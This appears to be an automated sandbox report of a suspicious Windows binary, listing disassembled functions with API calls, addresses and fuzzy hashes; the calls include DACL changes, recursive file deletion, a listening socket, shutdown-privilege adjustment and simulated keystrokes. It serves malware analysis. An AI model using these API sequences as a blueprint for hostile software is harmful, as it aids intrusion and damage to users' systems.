                                                                                                                                                          • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                                                                                                                                                          • Part of subcall function 00ACB8E7: RtlAllocateHeap.NTDLL(00000000,?,00ACB3CB), ref: 00ACB923
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                                                                                                                                                          • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                                                                                                                                                          • Part of subcall function 00ACB982: RtlAllocateHeap.NTDLL(00000000,?,00ACB3E1), ref: 00ACB995
                                                                                                                                                          • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB3FC
                                                                                                                                                        • _memset.LIBCMT ref: 00ACB411
                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB430
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB441
                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB47E
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB49A
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00ACB4B7
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB4C6
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ACB4CD
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB4EE
                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00ACB4F5
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB526
                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB54C
                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB560
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                                        • Opcode ID: 1f7393b58b3fde18665568c4ab4a94e39dfcd39d25429a15f680a773fcea0e4c
                                                                                                                                                        • Instruction ID: edc7c5d35c98157531a4db0f8736b7111a8211bf1cc9b3f712cd3982697eba45
                                                                                                                                                        • Opcode Fuzzy Hash: 1f7393b58b3fde18665568c4ab4a94e39dfcd39d25429a15f680a773fcea0e4c
                                                                                                                                                        • Instruction Fuzzy Hash: 03513A75910209ABDF04DFA5DC5AEEEBB79FF08300F05812DE916A7291DB369A05CB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                          • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6E7E
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AD6E99
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00AD6EAE
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AD6EDD
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6EEF
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6F01
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00AD6F0E
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6F22
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AD6F3D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                                                        • Opcode ID: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                                                                                                                                                        • Instruction ID: 15b48c53930a1b954a087b231504f4b589ab9228447fdd67d57ac1024e6f865d
                                                                                                                                                        • Opcode Fuzzy Hash: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                                                                                                                                                        • Instruction Fuzzy Hash: D321BF72409384AAC610EBA098849DBBBEC9B99314F444E1BF5D5C3152EB34D60D87A2
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                                        • Opcode ID: 029788d6c41efdd375ecd322ace8c054e5fc57f01891da80250943bafa432319
                                                                                                                                                        • Instruction ID: 9c30609ba24ee1f31221277024618338d60315d870c1a2a044e5ac371205b05e
                                                                                                                                                        • Opcode Fuzzy Hash: 029788d6c41efdd375ecd322ace8c054e5fc57f01891da80250943bafa432319
                                                                                                                                                        • Instruction Fuzzy Hash: 9021AE31704212AFDB10AF65DD59BAE7BA8EF44721F44801AF90ADB2A1DF74ED409B90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AE24F6
                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AE2526
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE253A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2555
                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AE25F3
                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AE2609
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                                                        • Opcode ID: e9cc39894a901f82ae0c2f344a158046d535ebe41a5594b05ce7de131bcb7459
                                                                                                                                                        • Instruction ID: 91514228ed72caecc0bad43c342b34c438d53d78cd16fb66df0075fb2c522243
                                                                                                                                                        • Opcode Fuzzy Hash: e9cc39894a901f82ae0c2f344a158046d535ebe41a5594b05ce7de131bcb7459
                                                                                                                                                        • Instruction Fuzzy Hash: 9F417B7190025AAFCF21DFA5CD59BEEBBB8FF04310F244456E815A2191EB349A94CBA0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: c416b18ac5e47f03571529a1cf824a55304c902a381e5f5797db705f0ef55226
                                                                                                                                                        • Instruction ID: a568cd564808ca3891e66195fa6ce8470af11f12e46b171ab80dec3bef141391
                                                                                                                                                        • Opcode Fuzzy Hash: c416b18ac5e47f03571529a1cf824a55304c902a381e5f5797db705f0ef55226
                                                                                                                                                        • Instruction Fuzzy Hash: F3129B70A00609DFDF14DFA4DA85AAEB7F5FF48300F208569E806E7291EB35AE15CB50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                          • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        • ReleaseCapture.USER32 ref: 00AFEB1A
                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00AFEBC2
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AFEBD5
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00AFECAE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                        • API String ID: 973565025-2107944366
                                                                                                                                                        • Opcode ID: ace4171b0a9c3fe1b9edd9ecae75db788c1b6e93696018317193cb07951815e4
                                                                                                                                                        • Instruction ID: 79b25d5cb36aa1c2f0fc1b4f76312639df006380a1c8fe4f3d670efcf49d05ae
                                                                                                                                                        • Opcode Fuzzy Hash: ace4171b0a9c3fe1b9edd9ecae75db788c1b6e93696018317193cb07951815e4
                                                                                                                                                        • Instruction Fuzzy Hash: DF51CD71204304AFD710EF64CD96FAA7BE5FB88744F40491CF6859B2E2CB709905CB62
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                                                                                                                                                          • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                                                                                                                                                          • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00AD830C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                                                        • Opcode ID: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                                                                                                                                                        • Instruction ID: 59feba3855613717be339bbe3f55665d5ca5fc3af73b2c9637a7064caf5c8426
                                                                                                                                                        • Opcode Fuzzy Hash: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                                                                                                                                                        • Instruction Fuzzy Hash: 8301A271B50315ABE768277C8C5BFFB7268AB05F80F140826F957EA2D2DE689C0081A4
                                                                                                                                                        APIs
                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AE9235
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9244
                                                                                                                                                        • bind.WS2_32(00000000,?,00000010), ref: 00AE9260
                                                                                                                                                        • listen.WS2_32(00000000,00000005), ref: 00AE926F
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9289
                                                                                                                                                        • closesocket.WS2_32(00000000), ref: 00AE929D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279440585-0
                                                                                                                                                        • Opcode ID: 3c8ea3868673a28173930aff5b04ff8ccf6dc49b8a1a6f24fd776d083540a678
                                                                                                                                                        • Instruction ID: 23824a676cadbd376b7fa6643dfa0c4602b0506ecf427cd048e644a6f5f7ce3a
                                                                                                                                                        • Opcode Fuzzy Hash: 3c8ea3868673a28173930aff5b04ff8ccf6dc49b8a1a6f24fd776d083540a678
                                                                                                                                                        • Instruction Fuzzy Hash: A8218B35600600AFCB10EF68CA85BAEB7E9AF84324F108159FA56AB3D1CB74AD41CB51
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                        • _memmove.LIBCMT ref: 00B03020
                                                                                                                                                        • _memmove.LIBCMT ref: 00B03135
                                                                                                                                                        • _memmove.LIBCMT ref: 00B031DC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1300846289-0
                                                                                                                                                        • Opcode ID: 64135f0a1ed64c28566e460a16adac637cd567b6381d227ecae9bbb22be7e09a
                                                                                                                                                        • Instruction ID: 80e736e9c2e9e9b79c5b0359fb402f6d97b7a8010ed1bb6264a4d7c7d2392cb5
                                                                                                                                                        • Opcode Fuzzy Hash: 64135f0a1ed64c28566e460a16adac637cd567b6381d227ecae9bbb22be7e09a
                                                                                                                                                        • Instruction Fuzzy Hash: 57029370A00205DFCF04DF68D985AAE7BF9EF59340F1480AAE806DB295EB31DE55CB91
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AEACD3: inet_addr.WS2_32(00000000), ref: 00AEACF5
                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00AE973D
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 00AE9760
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4170576061-0
                                                                                                                                                        • Opcode ID: 1536ca21f6629bbe116c055f8bb57f3118fc5a47dedf8fcfaee35a6451e331a0
                                                                                                                                                        • Instruction ID: bdf8ab3a8073fa0ac72c4edd6d14a1fe2d5650c904eb99d59b8a77a18f62fc97
                                                                                                                                                        • Opcode Fuzzy Hash: 1536ca21f6629bbe116c055f8bb57f3118fc5a47dedf8fcfaee35a6451e331a0
                                                                                                                                                        • Instruction Fuzzy Hash: 8841E374A00200AFDB10AF28CE82E6E77EDEF49324F148458F956AB3D2CB749D418B91
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00ADF37A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADF3AA
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADF3BF
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00ADF3D0
                                                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00ADF3FE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2387731787-0
                                                                                                                                                        • Opcode ID: 002ae121503a678bef98fb0f8917599cf04097d3c070d1556ad904de3e519115
                                                                                                                                                        • Instruction ID: 1c3c2c5c6d7236464aa7c6a7ab4d17f029aa046d9167ab69ac81c120d210134e
                                                                                                                                                        • Opcode Fuzzy Hash: 002ae121503a678bef98fb0f8917599cf04097d3c070d1556ad904de3e519115
                                                                                                                                                        • Instruction Fuzzy Hash: CF419D756047029FCB08DF28C490E9AB3E8FF49324F10456EE96ACB3A1DB31A945CB91
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AD439C
                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AD43B8
                                                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00AD4425
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00AD4483
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                        • Opcode ID: c7819ba1625cf0700d47d86096c70ee12dc54d99003267509671ebc8c19356dd
                                                                                                                                                        • Instruction ID: 65e9ffd7576f24b81cd6e6889531d451f489142b40338e1468a2a96299a8a922
                                                                                                                                                        • Opcode Fuzzy Hash: c7819ba1625cf0700d47d86096c70ee12dc54d99003267509671ebc8c19356dd
                                                                                                                                                        • Instruction Fuzzy Hash: 3641F2F1A00248ABEF208B659848BFDBBB5AB5D311F04415BF487973C1CB7489C59B62
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFEFE2
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B0F3C3,?,?,?,?,?), ref: 00AFEFF7
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFF041
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B0F3C3,?,?,?), ref: 00AFF077
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1423138444-0
                                                                                                                                                        • Opcode ID: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                                                                                                                                                        • Instruction ID: 3bf1fcf76baa129981ec7e738c3d211af3640420e657fd395e210efc0c80e1a8
                                                                                                                                                        • Opcode Fuzzy Hash: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                                                                                                                                                        • Instruction Fuzzy Hash: 7E21BF35600128AFCB258F98CC98FFA7BB5EF49754F0440A9FA05972A2DB319D51DBA0
                                                                                                                                                        APIs
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AD221E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                        • String ID: ($|
                                                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                                                        • Opcode ID: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                                                                                                                                                        • Instruction ID: 98ed8696a321bf73edfc82146d81fff7423f8ec32e99a046d98b940b151bf045
                                                                                                                                                        • Opcode Fuzzy Hash: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                                                                                                                                                        • Instruction Fuzzy Hash: 3A321475A007059FCB28CF69C480AAAB7F0FF58320B15C56EE49ADB7A1E770E941CB44
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00AAAE5E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        APIs
                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AE4A1E,00000000), ref: 00AE55FD
                                                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AE5629
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 599397726-0
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADEA95
                                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00ADEAEF
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00ADEB3C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1682464887-0
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD70D8
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AD7115
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD711E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 33631002-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • GetParent.USER32(?), ref: 00B0F4B5
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00AAADDD,?,?,?,00000006,?), ref: 00B0F52F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 314495775-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00B0F352,?,?,?), ref: 00AFF115
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00AFF0FB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1273190321-0
                                                                                                                                                        APIs
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFF47D
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00B0F42E,?,?,?,?,?), ref: 00AFF4A6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3420055661-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD73F
                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD751
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                        APIs
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AD4B89
                                                                                                                                                        • keybd_event.USER32(?,7608C0D0,?,00000000), ref: 00AD4B9C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                        APIs
                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00ACB8C5
